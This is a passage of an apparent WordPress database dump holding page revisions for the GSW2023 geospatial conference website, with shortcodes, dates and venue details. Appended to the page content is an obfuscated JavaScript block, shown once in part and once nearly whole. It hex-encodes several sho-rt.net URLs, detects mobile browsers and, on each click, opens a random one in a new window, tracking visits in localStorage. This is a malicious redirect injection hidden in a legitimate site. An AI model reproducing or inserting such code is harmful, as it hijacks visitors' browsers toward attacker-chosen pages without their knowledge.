)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 00:05:43','2023-02-04 00:05:43','',3066,'https://gsw2023.com/?p=3726',0,'revision','',0),
(3727,1,'2023-02-04 00:09:36','2023-02-04 00:09:36','<p>[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 